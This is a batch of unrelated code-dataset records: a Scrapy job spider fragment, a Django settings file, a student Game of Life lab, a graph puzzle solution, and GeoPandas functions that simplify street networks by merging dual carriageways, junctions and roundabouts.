loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('company', response.meta['company'])\n loader.add_value(\n 'location', response.meta['location'], Replace(unicode(\"工作地点:\", 'utf-8'))\n )\n loader.add_xpath(\n 'description',\n \"//div[@class='applybox']/preceding-sibling::node()[preceding-sibling::div[@class='jobbox_02_div']]\"\n )\n # try this xml only if above xpath not given any data\n if not loader.get_output_value('description'):\n loader.add_xpath(\n 'description',\n \"//div[@class='jobbox_02_divinfo']/node()[not(span/f)]\"\n )\n loader.add_xpath(\n 'jobtype',\n \"//li[contains(text(),'%s')]/text()\" % unicode(\"工作性质:\", 'utf-8'),\n Replace(unicode(\"工作性质:\", 'utf-8'))\n )\n loader.add_xpath(\n 'baseSalary',\n \"//li[contains(text(), '%s')]/text()\" % unicode(\"薪资待遇:\", 'utf-8'),\n Replace(unicode(\"薪资待遇:\", 'utf-8'))\n )\n loader.add_value(\n 'referencenumber', response.url, Prefix(self.name+\"-\"),\n re=self.ref_reg\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/job120.py","file_name":"job120.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"210795125","text":"# -*- coding: utf-8 -*-\n\nimport os\n\ndirs = ['fonts', 'fonts_reserve', 'raw_img', 'real_img_origin',\n 'real_img', 'fake_img', 'fake_img_mosaicking', 'model_data']\n\nfor dir in dirs:\n if not os.path.exists(dir):\n 
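# create each directory only when it is missing; os.makedirs(dir, exist_ok=True) is an equivalent one-liner\n        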
os.mkdir(dir)\n","sub_path":"make_dirs.py","file_name":"make_dirs.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204044711","text":"\"\"\"\nDjango settings for Butterflies project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '&&-w3r0%bk#ye8g&7b0lio*60%2+m!+4a%*ukbm#9u3+t3%l=*'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'rest_framework.authtoken',\n)\n\nTHIRD_PARTY_APPS = ()\n\nPROJECT_APPS = (\n 'polls',\n 'quadratic',\n 'exhibition',\n 'collector',\n 'sponsors',\n 'feedbacks',\n)\n\nINSTALLED_APPS = INSTALLED_APPS + PROJECT_APPS + THIRD_PARTY_APPS\n\nREST_FRAMEWORK = {\n 'DEFAULT_RENDERER_CLASSES': ('rest_framework.renderers.JSONRenderer',),\n 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAuthenticatedOrReadOnly',),\n 'PAGE_SIZE': 10,\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n ),\n}\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'butterflies.urls'\n\nWSGI_APPLICATION = 'butterflies.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Login\nLOGIN_REDIRECT_URL = '/'\n\nLOGIN_URL = '/login/'\n\n# Media files\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\nMEDIA_URL = '/media/'\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.request\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nPROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\nSTATIC_ROOT = 
os.path.join(PROJECT_ROOT, 'staticfiles')\nSTATIC_URL = '/static/'\n\n# Extra places for collectstatic to find static files.\nSTATICFILES_DIRS = (os.path.join(PROJECT_ROOT, 'static'),)\n\nTEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'), )\n\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 1025\n\nADMINS = (('Yevheniia', \"ZhenyaSmirnova@ukr.net\"), )\n\nLOGGING = {\n 'version': 1,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(funcName)s %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'loggers':\n {\n 'exhibition': {\n 'handlers': ['file_exhibition'],\n 'level': 'DEBUG',\n },\n 'collector': {\n 'handlers': ['file_collector'],\n 'level': 'DEBUG',\n },\n },\n 'handlers':\n {\n 'file_exhibition': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(BASE_DIR, 'exhibition_logger.log'),\n 'formatter': 'simple'\n },\n 'file_collector': {\n 'level': 'WARNING',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(BASE_DIR, 'collector_logger.log'),\n 'formatter': 'verbose'\n },\n },\n}\ntry:\n from .local_settings import *\nexcept ImportError:\n pass\n","sub_path":"butterflies/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"99441275","text":"#\n# life.py - Game of Life lab\n#\n# Name:Michael Sanchez\n# Pledge:I pledge my honor that I have abided by the Stevens Honor System\n# PS: I did game of life in high school\n\nimport random\n\ndef createOneRow(width):\n \"\"\"Returns one row of zeros of width \"width\"... \n You should use this in your\n createBoard(width, height) function.\"\"\"\n row = []\n for col in range(width):\n row += [0]\n return row\n\ndef createBoard(row,col):\n '''creates a board, but backwards from the way you learned 3 years ago(rows being nested instead of cols)'''\n a=[]\n for c in range(col):\n a+=[[0]*row]\n return a\n\ndef printBoard(a):\n '''Prints the board'''\n for r in range(len(a)):\n s=\"\"\n for c in range(len(a[0])):\n s+=str(a[r][c])\n print(s)\n\ndef diagonalize(width,height):\n \"\"\" creates an empty board and then modifies it\n so that it has a diagonal strip of \"on\" cells.\"\"\"\n A = createBoard( width, height )\n for row in range(height):\n for col in range(width):\n if row == col:\n A[row][col] = 1\n else:\n A[row][col] = 0\n return A\ndef innerCells(row,col):\n '''makes all cells but border cells equal to 1'''\n a=createBoard(r,c)\n for r in range(len(a)):\n for c in range(len(a[0])):\n if not r==0 and not r==len(a)-1 and not c==0 and not c==len(a[0]):\n a[r][c]==1\n return a\n\ndef randomCells(row,col):\n '''makes each cell randomly 1 or 0'''\n a=createBoard(row,col)\n for r in range(len(a)):\n for c in range(len(a[0])):\n a[r][c]==random.choice([0,1])\n return a\n\ndef copy(a):\n '''copies a 2d list'''\n b=[]\n for r in a:\n b+=[r]\n return b\n\ndef innerReverse(a):\n '''reverses everything but the border'''\n b=copy(a)\n for r in range(len(a)):\n for c in range(len(a[0])):\n if not r==0 and not r==len(a)-1 and not c==0 and not c==len(a[0]):\n b[r][c]==int(not b[r][c])\n return b\n\ndef next_life_generation(a):\n '''returns next generation based off of the rules from conways game of life'''\n def testNeighbors(d):\n '''tests all 8 neighbors and returns result'''\n totalN=0\n for r in range(3):\n for c in range(3):\n if not(r==1 and c==1):\n totalN+=d[r][c]\n return 1 if totalN==3 else (1 if (totalN==2 and 
d[1][1]==1) else 0)\n b=copy(a)\n for r in range(1,len(a)-1):\n for c in range(1,len(a[0])-1):\n b[r][c]=testNeighbors(\\\n [[a[r-1][c-1],a[r-1][c],a[r-1][c+1]],\\\n [a[r][c-1],a[r][c],a[r][c+1]],\\\n [a[r+1][c-1],a[r+1][c],a[r+1][c+1]]])\n return b\n\n","sub_path":"life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"2442804","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(1000000000)\n\nclass Node :\n def __init__(self, data) :\n self.data = data\n self.child = set()\n\nclass FriendMoney :\n def __init__(self) :\n self.N, self.M, self.K = map(int, input().rstrip().split(\" \"))\n self.money = list(map(int, input().rstrip().split(\" \")))\n self.friendDict = dict()\n for i in range(1, self.N+1) :\n self.friendDict[i] = Node(i)\n self.bfs = [0 for i in range(self.N+1)]\n \n def inputFriendRelation(self) :\n for _ in range(self.M) :\n a, b = map(int, input().split(\" \"))\n self.friendDict[b].child.add(self.friendDict[a])\n self.friendDict[a].child.add(self.friendDict[b])\n \n def checkFriends(self,temp,value) :\n result = value\n self.bfs[temp.data] = 1\n for i in temp.child :\n if self.bfs[i.data] == 1 :\n continue\n comp = self.checkFriends(i, result)\n if comp < result :\n result = comp\n return result\n \n def soluction(self) :\n total = self.K\n for i in range(1, 1+self.N) :\n if self.bfs[i] == 0 :\n pay = self.checkFriends(self.friendDict[i], self.money[i-1])\n total -= pay\n if total < 0 :\n return \"Oh no\"\n return self.K - total\n\nif __name__ == \"__main__\":\n print(\"Hello\")","sub_path":"back_joon/자료구조/back_joon_16562_친구비/back_joon_16562_ver2.py","file_name":"back_joon_16562_ver2.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"572668379","text":"import warnings\nwarnings.simplefilter(action='ignore')\n\nimport pandas as pd\nimport numpy as np\nimport geopandas as gpd\nimport math\nfrom math import sqrt\nfrom shapely.geometry import Point, LineString, Polygon, MultiPoint\nfrom shapely.ops import linemerge, nearest_points, split, polygonize_full, unary_union\n\npd.set_option('precision', 10)\npd.options.mode.chained_assignment = None\n\nimport statistics\nimport ast\nfrom .graph import nodes_degree\nfrom .utilities import center_line, merge_lines\nfrom .cleaning_network import clean_network, correct_edges\nfrom .angles import difference_angle_line_geometries, angle_line_geometries\n\ndef is_parallel(line_geometry_A, line_geometry_B, hard = False):\n \n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 30):\n return True\n \n line_coordsA = list(line_geometry_A.coords)\n line_coordsB = list(line_geometry_B.coords)\n if ((len(line_coordsA) == 2) | (len(line_coordsB) == 2)): \n return False\n \n if not hard:\n # remove first coordinates (A,B)\n line_geometry_A = LineString([coor for coor in line_coordsA[1:]])\n line_geometry_B = LineString([coor for coor in line_coordsB[1:]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n # remove first (A) and last (B)\n line_geometry_B = LineString([coor for coor in line_coordsB[:-1]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= 
-20): \n return True\n \n # remove last (A) and first (B)\n line_geometry_A = LineString([coor for coor in line_coordsA[:-1]])\n line_geometry_B = LineString([coor for coor in line_coordsB[1:]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n # remove last coordinates (A, B)\n line_geometry_A = LineString([coor for coor in line_coordsA[:-1]])\n line_geometry_B = LineString([coor for coor in line_coordsB[:-1]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n if ((len(line_coordsA) == 3) | (len(line_coordsB) == 3)):\n return False\n line_geometry_A = LineString([coor for coor in line_coordsA[1:-1]])\n line_geometry_B = LineString([coor for coor in line_coordsB[1:-1]])\n difference_angle = difference_angle_line_geometries(line_geometry_A, line_geometry_B)\n if (difference_angle <= 20) & (difference_angle >= -20): \n return True\n \n return False\n \ndef is_continuation(ix_lineA, ix_lineB, edges_gdf):\n\n nameA = edges_gdf.loc[ix_lineA]['name']\n nameB = edges_gdf.loc[ix_lineB]['name']\n line_geometry_A = edges_gdf.loc[ix_lineA]['geometry']\n line_geometry_B = edges_gdf.loc[ix_lineB]['geometry']\n if is_parallel(line_geometry_A, line_geometry_B, hard = True): \n return True\n return ((nameA == nameB) & (is_parallel(line_geometry_A, line_geometry_B, hard = False)))\n\ndef simplify_dual_lines_junctions(nodes_gdf, edges_gdf, max_difference_length = 0.40, max_distance_between_lines = 30):\n\n \"\"\"\n This function simplifies parallel or semi-parallel lines - which may represent dual carriageway roads.\n In this case, the roads originate and terminate from the same pair of nodes:\n - An uninterrupted (no intersecting roads along) street segment A is examined\n - The lines originating from its vertexes (u, v) are assesed.\n - Lines which are not parallel are disregarded.\n - The parallel lines are kept and their natural continuations are examined, again in relation to segment A.\n This line can originate for example in segment A's \"u\", traverse a certain amount of intermediate nodes and reach segment A's \"v\".\n - Thus, road B, if existing, is composed of continuous sub-segments parallel to segment A. The geometry obtained by merging road B continuous segments starts either in\n segmentA's \"u\" or \"v\" and terminates in either \"v\" or \"u\".\n - If such line is found a center line geometry is obtained.\n \n Interesecting roads are interpolated in the simplified road-center-line resulting geometry.\n \n If the researcher has assigned specific values to edges (e.g. densities of pedestrians, vehicular traffic or similar) please allow the function to combine\n the relative densities values during the cleaning process.\n \n Two parameters depend on street morphology and the user assessment:\n - max_difference_length: indicate here the max difference in length between the two lines (segmentA's geometry and roadB's). \n Specify the max percente difference in float. e.g. 
40% --> 0.40\n - max_distance_between_lines: float\n \n A new dataframe is returned with the simplified geometries.\n \n Parameters\n ----------\n nodes_gdf: Point GeoDataFrame\n edges_gdf: LineString GeoDataFrames\n max_difference_length: float\n max_distance_between_lines: float\n \n Returns\n -------\n GeoDataFrames\n \"\"\"\n \n nodes_gdf.index, edges_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID\n nodes_gdf.index.name, edges_gdf.index.name = None, None\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n \n edges_gdf['name'][edges_gdf.name.isnull()] = None\n edges_gdf = edges_gdf.where(pd.notnull(edges_gdf), None)\n original_edges_gdf = edges_gdf.copy()\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1 \n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n processed = []\n \n # the original geometries and edges are iterated and examined;\n for row in original_edges_gdf.itertuples():\n if row.Index in processed: \n continue \n \n for r in [ix_u, ix_v]:\n found = False\n possible_matches = original_edges_gdf[(original_edges_gdf['u'] == row[r]) | (original_edges_gdf['v'] == row[r])].copy()\n possible_matches.drop(row.Index, axis = 0, inplace = True)\n possible_matches = possible_matches[~possible_matches.index.isin(processed)]\n \n possible_matches = possible_matches[possible_matches.geometry.length < row[ix_geo].length]\n possible_matches['continuation'] = False\n possible_matches['continuation'] = possible_matches.apply(lambda c: is_continuation(row.Index, c.name, edges_gdf), axis = 1)\n possible_mathces = possible_matches[possible_matches.continuation]\n \n if len(possible_matches) == 0: \n continue\n if r == ix_u: \n direction = 'v'\n to_reach = row[ix_v] \n else: \n direction = 'u'\n to_reach = row[ix_u] \n \n for connector in possible_matches.itertuples():\n \n if connector[ix_u] == row[r]: \n search = connector[ix_v] \n else: search = connector[ix_u]\n\n nodes_traversed = [search]\n lines_traversed = [connector[ix_geo]]\n lines = [connector.Index]\n next_line = False # to determine when moving to the next candidate\n last_line = connector.Index\n\n while (not found) & (not next_line):\n # look for a new possible set of connectors\n next_possible_matches = original_edges_gdf[(original_edges_gdf['u'] == search) | (original_edges_gdf['v'] == search)].copy() \n next_possible_matches.drop([last_line, row.Index], axis = 0, inplace = True, errors = 'ignore') # remove the previous lines, in case\n next_possible_matches = next_possible_matches[~next_possible_matches.index.isin(processed)]\n\n for other_connector in next_possible_matches.itertuples():\n if not is_continuation(last_line, other_connector.Index, edges_gdf): \n next_possible_matches.drop(other_connector.Index, axis = 0, inplace = True)\n\n if len(next_possible_matches) == 0: \n next_line = True\n break\n\n if len(next_possible_matches) > 1: # if more than one candidate\n next_possible_matches['angle'] = 0.0\n for candidate in next_possible_matches.itertuples():\n angle = angle_line_geometries(edges_gdf.loc[last_line].geometry, candidate[ix_geo], deflection = True, degree = True)\n next_possible_matches.at[candidate.Index, 'angle'] = angle\n next_possible_matches.sort_values(by = 'angle', ascending = True, inplace = True) \n \n # take the best candidate's attribute\n u, v = next_possible_matches.iloc[0]['u'], next_possible_matches.iloc[0]['v']\n\n if u == search: \n search = next_possible_matches.iloc[0]['v']\n other = 
next_possible_matches.iloc[0]['u']\n else: \n search = next_possible_matches.iloc[0]['u']\n other = next_possible_matches.iloc[0]['v']\n\n distA = nodes_gdf.loc[search].geometry.distance(nodes_gdf.loc[to_reach].geometry)\n distB = nodes_gdf.loc[other].geometry.distance(nodes_gdf.loc[to_reach].geometry)\n\n if (search in nodes_traversed) | (distB < distA): \n next_line = True\n continue\n elif search == to_reach:\n lines_traversed.append(next_possible_matches.iloc[0].geometry)\n lines.append(next_possible_matches.iloc[0].name)\n found = True\n break\n else: \n nodes_traversed.append(search)\n lines_traversed.append(next_possible_matches.iloc[0].geometry)\n lines.append(next_possible_matches.iloc[0].name)\n last_line = next_possible_matches.iloc[0].name\n\n if next_line: \n continue\n else: break\n\n if not found: \n continue # no parallel dual lines at this node\n u, v, geo = row[ix_u], row[ix_v], row[ix_geo] \n merged_line = merge_lines(lines_traversed)\n \n # check whether it makes sense to merge or not\n if (geo.length*(max_difference_length+1) < merged_line.length) | (geo.length > merged_line.length*(max_difference_length+1)): \n continue\n if (geo.centroid.distance(merged_line.centroid) > max_distance_between_lines):\n continue\n \n # obtaining center line\n cl = center_line(geo, merged_line)\n processed = processed + lines\n processed.append(row.Index)\n if (\"pedestrian\" in edges_gdf.columns) & (len(edges_gdf.loc[lines][edges_gdf.pedestrian == 1]) > 0):\n edges_gdf.at[row.Index, 'pedestrian'] = 1\n if direction == 'u': \n nodes_traversed.reverse()\n # interpolate nodes encountered along the parallel lines\n interpolate_on_centre_line(row.Index, cl, nodes_gdf, edges_gdf, u, v, nodes_traversed)\n\n edges_gdf.drop(lines, axis = 0, inplace = True) \n break\n \n # correct the coordinates and clean the network\n edges_gdf = correct_edges(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, dead_ends = True, remove_disconnected_islands = False, same_uv_edges = True, self_loops = True)\n \n return(nodes_gdf, edges_gdf)\n\ndef simplify_complex_junctions(nodes_gdf, edges_gdf):\n \n \"\"\"\n This function simplifies complex junctions as trinagular-like junctions formed mainly by secondary links.\n The junction may be as well represented by one node rather than, for example, three nodes. \n \n If the researcher has assigned specific values to edges (e.g. 
densities of pedestrians, vehicular traffic or similar) please allow the function to combine\n the relative densities values during the cleaning process.\n \n The function takes a node and check whether the intersecting edges give shape to a triangular-cyclic junction.\n \n A new dataframe with the simplified geometries is returned.\n \n Parameters\n ----------\n nodes_gdf: Point GeoDataFrame\n edges_gdf: LineString GeoDataFrames\n \n Returns\n -------\n GeoDataFrames\n \"\"\"\n \n nodes_gdf.index, edges_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID\n nodes_gdf.index.name, edges_gdf.index.name = None, None\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n \n edges_gdf['name'][edges_gdf.name.isnull()] = None\n original_edges_gdf = edges_gdf.copy()\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1 \n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n ix_name = edges_gdf.columns.get_loc(\"name\")+1\n processed = []\n \n for node in nodes_gdf.itertuples():\n tmp = edges_gdf[(edges_gdf['u'] == node.Index) | (edges_gdf['v'] == node.Index)].copy()\n found = False\n \n # take one of these lines and examine its relationship with the others at the same junction\n for row in tmp.itertuples():\n if row.Index in processed: \n continue\n\n for other in tmp.itertuples():\n if (row.Index == other.Index) | (other.Index in processed): \n continue\n \n # determining the relationship\n if row[ix_u] == other[ix_u]: # the last one is 'v'\n v1, v2 = ix_v, ix_v\n last_vertex, code = -1, 'v'\n \n elif row[ix_u] == other[ix_v]: # the last one is 'u'\n v1, v2 = ix_v, ix_u\n last_vertex, code = -1, 'v'\n \n elif row[ix_v] == other[ix_u]: # the last one is 'u'\n v1, v2 = ix_u, ix_v\n last_vertex, code = 0, 'u'\n \n elif row[ix_v] == other[ix_v]: # the last one is 'u'\n v1, v2 = ix_u, ix_u\n last_vertex, code = 0, 'u'\n else: continue\n \n # look for the connector segment\n possible_matches = edges_gdf[((edges_gdf['u'] == row[v1]) & (edges_gdf['v'] == other[v2])) | ((edges_gdf['u'] == other[v2]) & (edges_gdf['v'] == row[v1]))].copy()\n if len(possible_matches) == 0: \n continue\n connector = possible_matches.iloc[0]\n \n u, v, u_other, v_other = row[ix_u], row[ix_v], other[ix_u], other[ix_v]\n geo, other_geometry, connector_geometry = row[ix_geo], other[ix_geo], connector.geometry\n if any(i > 100 for i in [geo.length, other_geometry.length, connector_geometry.length]): \n break # segments are too long\n \n diff_A = abs(geo.length - other_geometry.length) \n diff_B = abs(geo.length - connector_geometry.length)\n diff_C = abs(other_geometry.length- connector_geometry.length)\n if (diff_B < diff_A) | (diff_C < diff_A): \n continue \n if (diff_A > geo.length*0.75) | (diff_A > other_geometry.length*0.75):\n continue\n if (connector_geometry.length > (geo.length + other_geometry.length)*1.25): \n continue \n if (diff_A > geo.length*0.25) | (diff_A > other_geometry.length*0.25): \n continue\n \n if \"pedestrian\" in edges_gdf.columns: \n if edges_gdf.loc[other.Index]['pedestrian'] == 1: \n edges_gdf.at[row.Index, 'pedestrian'] = 1\n \n # drop the other line\n edges_gdf.drop(other.Index, axis = 0, inplace = True)\n cl = center_line(geo, other_geometry)\n intersection = cl.intersection(connector_geometry)\n ix_node = nodes_gdf.index.max()+1\n nodes_gdf.loc[ix_node] = nodes_gdf.loc[row[v1]] # copy attributes\n nodes_gdf.at[ix_node, 'nodeID'] = ix_node\n \n ix_edge = edges_gdf.index.max()+1\n edges_gdf.loc[ix_edge] = edges_gdf.loc[connector.name]\n edges_gdf.at[ix_edge, 
'edgeID'] = ix_edge\n edges_gdf.at[row.Index, code] = ix_node\n\n if intersection.geom_type == 'Point': # check if the center line reaches the connector\n last = intersection.coords[0]\n line = split_line_at_interpolation(intersection, cl)[0]\n nodes_gdf.at[ix_node, 'geometry'] = intersection\n \n if code == 'u': \n edges_gdf.at[row.Index,'geometry'] = line[1]\n else: edges_gdf.at[row.Index,'geometry'] = line[0]\n \n line = split_line_at_interpolation(intersection, connector_geometry)[0]\n edges_gdf.at[connector.name, 'geometry'] = line[0]\n edges_gdf.at[connector.name, 'v'] = ix_node\n edges_gdf.at[ix_edge, 'u'] = ix_node\n edges_gdf.at[ix_edge, 'geometry'] = line[1]\n\n else: # no intersection, extend lines towards center line\n last = list(cl.coords)[last_vertex]\n nodes_gdf.at[ix_node, 'geometry'] = Point(last)\n edges_gdf.at[row.Index,'geometry'] = cl\n\n line_geometry_A = LineString([coor for coor in [connector_geometry.coords[0], last]])\n line_geometry_B = LineString([coor for coor in [last, connector_geometry.coords[-1]]])\n edges_gdf.at[connector.name, 'geometry'] = line_geometry_A\n edges_gdf.at[ix_edge, 'geometry'] = line_geometry_B\n edges_gdf.at[connector.name, 'v'] = ix_node\n edges_gdf.at[ix_edge, 'u'] = ix_node\n \n processed = processed + [row.Index, other.Index]\n nodes_gdf.at[ix_node, 'x'] = last[0]\n nodes_gdf.at[ix_node, 'y'] = last[1]\n \n found = True\n break\n \n if found: \n break\n \n edges_gdf = correct_edges(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, dead_ends = True, remove_disconnected_islands = False, same_uv_edges = True, self_loops = True) \n return(nodes_gdf, edges_gdf)\n\n\n\ndef dissolve_roundabouts(nodes_gdf, edges_gdf, max_length_segment = 80, angle_tolerance = 40):\n\n nodes_gdf.index, edges_gdf.index = nodes_gdf.nodeID, edges_gdf.edgeID\n nodes_gdf.index.name, edges_gdf.index.name = None, None\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1 \n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1\n\n processed_segments = []\n processed_nodes = []\n \n # editing the ones which only connect three edges\n to_edit = {k: v for k, v in nodes_degree(edges_gdf).items() if v == 3}\n if len(to_edit) == 0: \n return(nodes_gdf, edges_gdf)\n to_edit_gdf = nodes_gdf[nodes_gdf.nodeID.isin(list(to_edit.keys()))]\n \n \n for node in to_edit_gdf.itertuples():\n\n if node in processed_nodes: \n continue\n tmp = edges_gdf[(edges_gdf['u'] == node.Index) | (edges_gdf['v'] == node.Index)].copy()\n found = False\n not_a_roundabout = False\n \n # take one of these lines and examine its relationship with the others at the same junction\n for row in tmp.itertuples():\n if row[ix_geo].length > max_length_segment: \n continue #too long for being a roundabout segment\n sequence_nodes = [node.Index]\n sequence_segments = [row.Index]\n if row.Index in processed_segments: \n continue\n \n if row[ix_u] == node.Index: \n last_vertex = row[ix_v]\n else: last_vertex = row[ix_u]\n \n sequence_nodes.append(last_vertex)\n segment = row\n distance = 0\n second_candidate = False\n \n while not found:\n if distance >= 400: \n break # too much traversed distance for a roundabout\n if last_vertex in processed_nodes: # the node has been dissolved already\n if not second_candidate: \n break\n distance -= segment[ix_geo].length\n segment = sc\n distance += segment[ix_geo].length\n sequence_segments[-1] = segment[0]\n last_vertex = sc_last_vertex\n 
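# the first walk dead-ended, so resume from the second-best connector recorded earlier\r\n                    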
sequence_nodes[-1] = sc_last_vertex\n second_candidate = False\n continue\n \n possible_connectors = edges_gdf[(edges_gdf['u'] == last_vertex) | (edges_gdf['v'] == last_vertex)].copy()\n for connector in possible_connectors.itertuples():\n \n if (segment[0] == connector.Index) | (connector.Index in processed_segments): \n possible_connectors.drop(connector.Index, axis = 0, inplace = True)\n elif connector[ix_geo].length > max_length_segment: \n possible_connectors.drop(connector.Index, axis = 0, inplace = True)\n else: \n angle = angle_line_geometries(segment[ix_geo], connector[ix_geo], angular_change = True, degree = True)\n if angle > angle_tolerance: \n possible_connectors.drop(connector.Index, axis = 0, inplace = True)\n else: possible_connectors.at[connector.Index, 'angle'] = angle\n \n if (len(possible_connectors) == 0) | (last_vertex in processed_nodes):\n if not second_candidate: \n break\n else:\n distance -= segment[ix_geo].length\n segment = sc\n distance += segment[ix_geo].length\n sequence_segments[-1] = segment[0]\n last_vertex = sc_last_vertex\n sequence_nodes[-1] = sc_last_vertex\n second_candidate = False\n continue\n\n else: possible_connectors.sort_values(by = 'angle', ascending = True, inplace = True) \n \n segment = list(possible_connectors.iloc[0])\n segment.insert(0, possible_connectors.iloc[0].name)\n \n if len(possible_connectors) > 1:\n sc = list(possible_connectors.iloc[1])\n sc.insert(0, possible_connectors.iloc[1].name)\n second_candidate = True\n if sc[ix_u] == last_vertex:\n sc_last_vertex = sc[ix_v]\n else: sc_last_vertex = sc[ix_u]\n \n if segment[ix_u] == last_vertex:\n last_vertex = segment[ix_v]\n else: last_vertex = segment[ix_u]\n sequence_nodes.append(last_vertex)\n sequence_segments.append(segment[0]) \n distance += segment[ix_geo].length\n \n if last_vertex == node.Index:\n lm = linemerge(edges_gdf.loc[i].geometry for i in sequence_segments)\n roundabout = polygonize_full(lm)[0]\n if len(roundabout) == 0:\n not_a_roundabout = True\n break\n \n centroid = roundabout.centroid\n distances = [nodes_gdf.loc[i].geometry.distance(centroid) for i in sequence_nodes]\n shortest, longest, mean = min(distances), max(distances), statistics.mean(distances) \n if (shortest < mean * 0.80) | (longest > mean * 1.20): \n not_a_roundabout = True\n break\n\n found = True\n new_index = max(nodes_gdf.index)+1\n\n nodes_gdf.loc[new_index] = nodes_gdf.loc[node.Index]\n nodes_gdf.at[new_index,'nodeID'] = new_index\n nodes_gdf.at[new_index,'geometry'] = centroid\n nodes_gdf.at[new_index,'x'] = centroid.coords[0][0]\n nodes_gdf.at[new_index,'y'] = centroid.coords[0][1]\n processed_segments = processed_segments + sequence_segments\n processed_nodes = processed_nodes + sequence_nodes + [new_index]\n 